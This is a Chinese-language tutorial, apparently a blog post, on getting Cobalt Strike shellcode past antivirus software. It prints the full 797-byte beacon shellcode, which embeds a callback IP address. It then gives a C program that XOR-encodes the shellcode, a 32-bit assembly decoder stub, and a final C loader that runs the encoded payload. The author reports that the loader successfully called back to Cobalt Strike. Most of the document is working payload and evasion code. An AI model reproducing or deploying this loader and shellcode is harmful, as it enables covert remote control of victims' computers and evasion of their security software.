首先用 Cobalt Strike 生成 C 语言格式(原生 C)的 shellcode,我生成的是:
/* length: 797 bytes
   Raw shellcode as generated by Cobalt Strike; this is the plaintext input
   to the XOR encoder below. It is stored as a string literal, so sizeof(buf)
   is 798: the compiler-added NUL terminator is not part of the payload,
   which is why 797 is hard-coded everywhere below. The payload contains many
   0x00 bytes and clear-text HTTP strings (a "User-Agent:" header near the
   end), and it is 32-bit code - the decoder stub and loader further down
   use 32-bit registers. */
unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c"
"\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
"\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01"
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68"
"\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00"
"\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6"
"\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d"
"\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0"
"\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00"
"\x00\xe8\x8b\xff\xff\xff\x2f\x71\x41\x52\x58\x00\xb5\x37\x71\xcd\x36\x1c\x5b\x6d\xa8\x2c\x36"
"\xd0\xfa\x3d\x5b\xe2\x82\xa5\x4f\xbe\x67\xf0\x92\x6c\xec\x22\x6f\xa0\x68\x22\x94\x31\xb9\x81"
"\xf5\xfe\x68\x06\x04\x1a\xbc\xcf\xa5\xdc\xfd\xa0\x49\x31\xa4\x74\x12\xb4\x15\x76\x48\xf2\x81"
"\x6a\xfb\x01\x82\x94\x61\x1e\x40\x85\x2d\x31\x06\x2d\x62\x22\xfa\x00\x55\x73\x65\x72\x2d\x41"
"\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70"
"\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b"
"\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x31\x2e\x31\x2e\x34\x33\x32\x32\x3b\x20\x42\x4f\x49"
"\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x97\xd8\x20\x60\x52\xa4\x8b\xc5\x6b\xbc\xb7\xfc"
"\xa8\xd8\x88\x4c\xf9\xa7\x49\x83\x03\x49\x1b\x4d\x3b\xfa\x0d\x33\xf2\x44\xfc\x58\x69\x9f\xbb"
"\xe1\xbb\xe4\x30\x00\xd5\x64\x33\xea\x9b\x04\x7d\xc4\x36\xde\xcb\x60\xdb\xf2\x7c\x85\xa5\xfe"
"\xfc\xaa\x17\x66\xc5\x6d\xaa\xda\x01\xec\x03\xad\xa1\x26\xe0\x12\xfb\xe1\x55\xa6\x38\xd8\xf9"
"\x61\x0b\x27\x58\xca\xae\xc5\xf1\x07\x6b\xcb\xd6\x46\x5a\xe4\x50\x14\x1b\x38\xe0\xda\x62\x8c"
"\x6e\xb8\xa7\x13\x87\x89\x02\x8e\x08\xb4\xd8\x52\xdc\x3e\x67\xde\xf5\x70\xb5\xee\x81\x96\x42"
"\x82\x2b\x96\xbb\x35\x30\x6d\x01\x59\xec\x98\xe6\x76\x21\x13\xe7\x4d\x8f\x4f\xb3\xf1\x89\x53"
"\xd3\xc4\xa6\xa3\xdf\x99\xf9\x80\x65\x8d\x5d\x30\x9d\xf7\x1a\x32\xd6\xfb\xb8\xf6\x59\x46\x26"
"\xe1\x2c\xc8\xa8\xe8\x4b\x7c\x3d\x97\x59\x50\xd7\x93\x11\xe1\xd3\xcf\x9f\x08\x22\x9b\x00\x68"
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56"
"\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9"
"\xfd\xff\xff\x34\x37\x2e\x39\x34\x2e\x32\x34\x32\x2e\x31\x36\x00\x6f\xaa\x51\xc3";
找一个 key 做单字节异或,我选的是 0x47。key 要选 shellcode 里没有出现过的字节:某个字节若与 key 相等,异或后就会变成 0x00(就这个加载器而言 0x00 其实无害,因为解码 stub 用的是固定长度 797 而不是字符串结尾,但习惯上还是避免)。怎么找?把 shellcode 复制到文本编辑器里,用查找功能从 \x01 开始逐个搜索,直到找到一个搜不到的字节为止。
接着对 shellcode 做异或编码。由于 shellcode 较长,编码结果直接写到文件 encode.txt 里,编码程序如下:
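#include "stdlib.h"
#include "stdio.h"
#include "string.h"

/* Single-byte XOR key. Picked by hand (see the text above) so that it does
   not occur anywhere in shellcode[]: a payload byte equal to the key would
   encode to 0x00. main() re-checks that and warns if it is violated. */
char key = 0x47;

/* length: 797 bytes
   Raw 32-bit shellcode from Cobalt Strike, identical to buf[] above. It is a
   string literal, so sizeof(shellcode) is 798: the compiler-added NUL
   terminator is not part of the payload and must not be encoded. */
unsigned char shellcode[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c"
"\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
"\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01"
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68"
"\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00"
"\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6"
"\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5"
"\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d"
"\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0"
"\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00"
"\x00\xe8\x8b\xff\xff\xff\x2f\x71\x41\x52\x58\x00\xb5\x37\x71\xcd\x36\x1c\x5b\x6d\xa8\x2c\x36"
"\xd0\xfa\x3d\x5b\xe2\x82\xa5\x4f\xbe\x67\xf0\x92\x6c\xec\x22\x6f\xa0\x68\x22\x94\x31\xb9\x81"
"\xf5\xfe\x68\x06\x04\x1a\xbc\xcf\xa5\xdc\xfd\xa0\x49\x31\xa4\x74\x12\xb4\x15\x76\x48\xf2\x81"
"\x6a\xfb\x01\x82\x94\x61\x1e\x40\x85\x2d\x31\x06\x2d\x62\x22\xfa\x00\x55\x73\x65\x72\x2d\x41"
"\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70"
"\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f"
"\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x3b"
"\x20\x2e\x4e\x45\x54\x20\x43\x4c\x52\x20\x31\x2e\x31\x2e\x34\x33\x32\x32\x3b\x20\x42\x4f\x49"
"\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x97\xd8\x20\x60\x52\xa4\x8b\xc5\x6b\xbc\xb7\xfc"
"\xa8\xd8\x88\x4c\xf9\xa7\x49\x83\x03\x49\x1b\x4d\x3b\xfa\x0d\x33\xf2\x44\xfc\x58\x69\x9f\xbb"
"\xe1\xbb\xe4\x30\x00\xd5\x64\x33\xea\x9b\x04\x7d\xc4\x36\xde\xcb\x60\xdb\xf2\x7c\x85\xa5\xfe"
"\xfc\xaa\x17\x66\xc5\x6d\xaa\xda\x01\xec\x03\xad\xa1\x26\xe0\x12\xfb\xe1\x55\xa6\x38\xd8\xf9"
"\x61\x0b\x27\x58\xca\xae\xc5\xf1\x07\x6b\xcb\xd6\x46\x5a\xe4\x50\x14\x1b\x38\xe0\xda\x62\x8c"
"\x6e\xb8\xa7\x13\x87\x89\x02\x8e\x08\xb4\xd8\x52\xdc\x3e\x67\xde\xf5\x70\xb5\xee\x81\x96\x42"
"\x82\x2b\x96\xbb\x35\x30\x6d\x01\x59\xec\x98\xe6\x76\x21\x13\xe7\x4d\x8f\x4f\xb3\xf1\x89\x53"
"\xd3\xc4\xa6\xa3\xdf\x99\xf9\x80\x65\x8d\x5d\x30\x9d\xf7\x1a\x32\xd6\xfb\xb8\xf6\x59\x46\x26"
"\xe1\x2c\xc8\xa8\xe8\x4b\x7c\x3d\x97\x59\x50\xd7\x93\x11\xe1\xd3\xcf\x9f\x08\x22\x9b\x00\x68"
"\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53"
"\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56"
"\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9"
"\xfd\xff\xff\x34\x37\x2e\x39\x34\x2e\x32\x34\x32\x2e\x31\x36\x00\x6f\xaa\x51\xc3";

/* Payload length without the literal's NUL terminator (797 for the array
   above). Derived from sizeof so the constant cannot drift from the data. */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* XOR every byte of src[0..len) with k into dst. dst and src may be the same
   buffer; the caller owns both. */
static void xor_bytes(unsigned char *dst, const unsigned char *src, size_t len, unsigned char k)
{
    size_t i;
    for (i = 0; i < len; i++) {
        dst[i] = src[i] ^ k;
    }
}

/* Write data[0..len) to fp as a C string literal: "\xNN" escapes, 16 per
   line, the layout the encode[] array below is pasted from. Returns 0 on
   success, -1 if any write fails (the caller still has to fclose). */
static int dump_hex(FILE *fp, const unsigned char *data, size_t len)
{
    size_t i;
    if (fputc('"', fp) == EOF) {
        return -1;
    }
    for (i = 0; i < len; i++) {
        if (fprintf(fp, "\\x%02x", (unsigned)data[i]) < 0) {
            return -1;
        }
        /* close the literal and open a new one every 16 bytes */
        if ((i + 1) % 16 == 0 && fputs("\"\n\"", fp) == EOF) {
            return -1;
        }
    }
    if (fputc('"', fp) == EOF) {
        return -1;
    }
    return 0;
}

/* Encode shellcode[] with key and dump it to ./encode.txt. Exit status 0 on
   success, 1 on allocation or I/O failure. */
int main(void)
{
    size_t len = SHELLCODE_LEN;
    size_t i;
    unsigned char *output;
    FILE *fp;
    int rc;

    /* Sanity-check the hand-picked key (see the text above). A hit is not
       fatal for this loader - the decoder stub uses the explicit length 797,
       not a NUL terminator - but it defeats the reason the key was chosen. */
    for (i = 0; i < len; i++) {
        if (shellcode[i] == (unsigned char)key) {
            fprintf(stderr, "warning: key 0x%02x occurs in shellcode at offset %u; "
                            "encoded output will contain 0x00\n",
                    (unsigned)(unsigned char)key, (unsigned)i);
            break;
        }
    }

    /* malloc(0) may legitimately return NULL; request at least one byte */
    output = malloc(len > 0 ? len : 1);
    if (output == NULL) {
        perror("malloc");
        return 1;
    }
    xor_bytes(output, shellcode, len, (unsigned char)key);

    fp = fopen("./encode.txt", "w+");
    if (fp == NULL) {
        perror("fopen ./encode.txt");
        free(output);
        return 1;
    }
    rc = dump_hex(fp, output, len);
    /* fclose flushes; a failure here means the file on disk is incomplete */
    if (fclose(fp) == EOF) {
        rc = -1;
    }
    free(output);

    if (rc != 0) {
        fprintf(stderr, "failed to write ./encode.txt\n");
        return 1;
    }
    printf("dump the encoded shellcode to encode.txt OK!\n");
    return 0;
}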
运行编码程序,在 encode.txt 中得到异或编码后的 shellcode。注意单字节异或只是混淆/编码,并不是加密:key 只有 256 种可能,而原始 shellcode 里大量的 0x00 异或后全部变成 key 本身(编码结果里反复出现的 \x47),统计一下最常见字节就能直接还原。
解码 stub(MSVC 内联汇编,32 位):
__asm{
    ; In-place XOR decoder stub. Entry contract: eax holds the address of
    ; this stub's own first byte (the loader below does lea eax,encode /
    ; push eax / ret). The 797 encoded bytes sit immediately after the 24
    ; bytes of machine code this assembles to; they are XOR-decoded in place
    ; with 47h, and when `loop` falls through execution continues straight
    ; into the freshly decoded shellcode. Clobbers eax, ebx (bl), ecx, edx.
    ; Any change here alters the stub's byte length, which is hard-coded in
    ; `add eax,24`. NOTE(review): the explicit `ds:` overrides are what emit
    ; the 3E prefix bytes seen at the start of encode[] below; dropping them
    ; shortens the stub and breaks the 24.
    add eax,24                      ; skip the stub itself -> start of encoded payload
    mov ecx,797                     ; number of encoded bytes (stub not included)
    xor edx,edx                     ; edx = byte offset, counts up from 0
decode:
    mov bl,byte ptr ds:[eax+edx]
    xor bl,47h                      ; single-byte XOR key
    mov byte ptr ds:[eax+edx],bl
    inc edx
    loop decode                     ; ecx--, branch while ecx != 0
}
797 是编码后 shellcode 的字节数(即 encode.txt 里的内容;注意下面的 encode 数组本身是 24+797=821 字节,前 24 字节是解码 stub),24 是这段 stub 的机器码长度,47h 是异或用的 key。这三个数必须和实际数据一致:stub 改动任何一条指令,24 就要跟着改。
编译后反汇编(或在调试器里查看),得到这段 stub 对应的 24 字节机器码,
把这 24 字节机器码拼在编码后的 shellcode 前面,组成下面的 encode 数组。执行时先跳到数组开头的 stub,stub 通过 add eax,24 跳过自身,把后面的 797 字节原地异或还原,loop 结束后顺序执行紧接着的、已还原的 shellcode。
最终程序:
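#include "stdlib.h"
#include "stdio.h"
#include "string.h"

/* XOR key. Not referenced by the C code here - the decoder stub carries 47h
   inline (the \x80\xF3\x47 bytes below) - kept only for reference. */
char key = 0x47;

/* encode[] = 24-byte decoder stub (machine code of the __asm block above)
   followed by the 797 XOR-encoded payload bytes pasted from encode.txt,
   821 bytes in total. The stub expects eax to point at its own first byte,
   decodes the 797 bytes after it in place, then falls through into them. */
unsigned char encode[] = "\x83\xC0\x18\xB9\x1d\x03\x00\x00\x33\xD2\x3E\x8A\x1C\x10\x80\xF3\x47\x3E\x88\x1C\x10\x42\xE2\xF2"
"\xbb\xaf\xce\x47\x47\x47\x27\xce\xa2\x76\x95\x23\xcc\x15\x77\xcc"
"\x15\x4b\xcc\x15\x53\xcc\x35\x6f\x48\xf0\x0d\x61\x76\xb8\x76\x87"
"\xeb\x7b\x26\x3b\x45\x6b\x67\x86\x88\x4a\x46\x80\xa5\xb7\x15\x10"
"\xcc\x15\x57\xcc\x05\x7b\x46\x97\xcc\x07\x3f\xc2\x87\x33\x0d\x46"
"\x97\x17\xcc\x0f\x5f\xcc\x1f\x67\x46\x94\xa4\x7b\x0e\xcc\x73\xcc"
"\x46\x91\x76\xb8\x76\x87\xeb\x86\x88\x4a\x46\x80\x7f\xa7\x32\xb3"
"\x44\x3a\xbf\x7c\x3a\x63\x32\xa5\x1f\xcc\x1f\x63\x46\x94\x21\xcc"
"\x4b\x0c\xcc\x1f\x5b\x46\x94\xcc\x43\xcc\x46\x97\xce\x03\x63\x63"
"\x1c\x1c\x26\x1e\x1d\x16\xb8\xa7\x1f\x18\x1d\xcc\x55\xac\xc1\x1a"
"\x2f\x29\x22\x33\x47\x2f\x30\x2e\x29\x2e\x13\x2f\x0b\x30\x61\x40"
"\xb8\x92\x76\xb8\x10\x10\x10\x10\x10\x2f\x7d\x11\x3e\xe0\xb8\x92"
"\xae\xc3\x47\x47\x47\x1c\x76\x8e\x16\x16\x2d\x44\x16\x16\x2f\xfc"
"\x46\x47\x47\x14\x17\x2f\x10\xce\xd8\x81\xb8\x92\xac\x37\x1c\x76"
"\x95\x15\x2f\x47\x45\x07\xc3\x15\x15\x15\x14\x15\x17\x2f\xac\x12"
"\x69\x7c\xb8\x92\xce\x81\xc4\x84\x17\x76\xb8\x10\x10\x2d\xb8\x14"
"\x11\x2f\x6a\x41\x5f\x3c\xb8\x92\xc2\x87\x48\xc3\x84\x46\x47\x47"
"\x76\xb8\xc2\xb1\x33\x43\xce\xbe\xac\x4e\x2f\xed\x82\xa5\x1a\xb8"
"\x92\xce\x86\x2f\x02\x66\x19\x76\xb8\x92\x76\xb8\x10\x2d\x40\x16"
"\x11\x17\x2f\xf0\x10\xa7\x4c\xb8\x92\xf8\x47\x68\x47\x47\x7e\x80"
"\x33\xf0\x76\xb8\xae\xd6\x46\x47\x47\xae\x8e\x46\x47\x47\xaf\xcc"
"\xb8\xb8\xb8\x68\x36\x06\x15\x1f\x47\xf2\x70\x36\x8a\x71\x5b\x1c"
"\x2a\xef\x6b\x71\x97\xbd\x7a\x1c\xa5\xc5\xe2\x08\xf9\x20\xb7\xd5"
"\x2b\xab\x65\x28\xe7\x2f\x65\xd3\x76\xfe\xc6\xb2\xb9\x2f\x41\x43"
"\x5d\xfb\x88\xe2\x9b\xba\xe7\x0e\x76\xe3\x33\x55\xf3\x52\x31\x0f"
"\xb5\xc6\x2d\xbc\x46\xc5\xd3\x26\x59\x07\xc2\x6a\x76\x41\x6a\x25"
"\x65\xbd\x47\x12\x34\x22\x35\x6a\x06\x20\x22\x29\x33\x7d\x67\x0a"
"\x28\x3d\x2e\x2b\x2b\x26\x68\x73\x69\x77\x67\x6f\x24\x28\x2a\x37"
"\x26\x33\x2e\x25\x2b\x22\x7c\x67\x0a\x14\x0e\x02\x67\x7f\x69\x77"
"\x7c\x67\x10\x2e\x29\x23\x28\x30\x34\x67\x09\x13\x67\x72\x69\x76"
"\x7c\x67\x13\x35\x2e\x23\x22\x29\x33\x68\x73\x69\x77\x7c\x67\x69"
"\x09\x02\x13\x67\x04\x0b\x15\x67\x76\x69\x76\x69\x73\x74\x75\x75"
"\x7c\x67\x05\x08\x0e\x02\x7f\x7c\x02\x09\x12\x14\x6e\x4a\x4d\x47"
"\xd0\x9f\x67\x27\x15\xe3\xcc\x82\x2c\xfb\xf0\xbb\xef\x9f\xcf\x0b"
"\xbe\xe0\x0e\xc4\x44\x0e\x5c\x0a\x7c\xbd\x4a\x74\xb5\x03\xbb\x1f"
"\x2e\xd8\xfc\xa6\xfc\xa3\x77\x47\x92\x23\x74\xad\xdc\x43\x3a\x83"
"\x71\x99\x8c\x27\x9c\xb5\x3b\xc2\xe2\xb9\xbb\xed\x50\x21\x82\x2a"
"\xed\x9d\x46\xab\x44\xea\xe6\x61\xa7\x55\xbc\xa6\x12\xe1\x7f\x9f"
"\xbe\x26\x4c\x60\x1f\x8d\xe9\x82\xb6\x40\x2c\x8c\x91\x01\x1d\xa3"
"\x17\x53\x5c\x7f\xa7\x9d\x25\xcb\x29\xff\xe0\x54\xc0\xce\x45\xc9"
"\x4f\xf3\x9f\x15\x9b\x79\x20\x99\xb2\x37\xf2\xa9\xc6\xd1\x05\xc5"
"\x6c\xd1\xfc\x72\x77\x2a\x46\x1e\xab\xdf\xa1\x31\x66\x54\xa0\x0a"
"\xc8\x08\xf4\xb6\xce\x14\x94\x83\xe1\xe4\x98\xde\xbe\xc7\x22\xca"
"\x1a\x77\xda\xb0\x5d\x75\x91\xbc\xff\xb1\x1e\x01\x61\xa6\x6b\x8f"
"\xef\xaf\x0c\x3b\x7a\xd0\x1e\x17\x90\xd4\x56\xa6\x94\x88\xd8\x4f"
"\x65\xdc\x47\x2f\xb7\xf2\xe5\x11\xb8\x92\x2d\x07\x2f\x47\x57\x47"
"\x47\x2f\x47\x47\x07\x47\x10\x2f\x1f\xe3\x14\xa2\xb8\x92\xd4\xfe"
"\x47\x47\x47\x47\x46\x9e\x16\x14\xce\xa0\x10\x2f\x47\x67\x47\x47"
"\x14\x11\x2f\x55\xd1\xce\xa5\xb8\x92\xc2\x87\x33\x81\xcc\x40\x46"
"\x84\xc2\x87\x32\xa2\x1f\x84\xaf\xee\xba\xb8\xb8\x73\x70\x69\x7e"
"\x73\x69\x75\x73\x75\x69\x76\x71\x47\x28\xed\x16\x84";

/* Transfer control to the first byte of encode[] (the decoder stub), which
   in turn runs the decoded payload. Requires a 32-bit MSVC build: __asm is
   MSVC-only and the stub uses 32-bit registers.
   NOTE(review): encode[] is a writable global, i.e. it lives in a data
   section, and the stub both executes it and writes back into it. Nothing
   on this page makes that section executable, so as written this relies on
   DEP/NX being disabled for the binary - confirm the project/linker
   settings before expecting it to run. */
int main(void)
{
    __asm {
        lea eax,encode              ; eax = &encode[0], the stub's entry contract
        push eax
        ret                         ; pop it straight into eip
    }
    /* Only reached if control ever comes back from the stub/payload. */
    return 0;
}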
运行前把火绒、360 等安全软件关了(整个测试应在隔离的虚拟机里做),运行后 Cobalt Strike 成功上线。注意:单字节异或只改变文件里的静态特征,解码后的 shellcode 在内存中仍是原样;关掉杀软再运行,并没有验证运行时/内存层面的检测。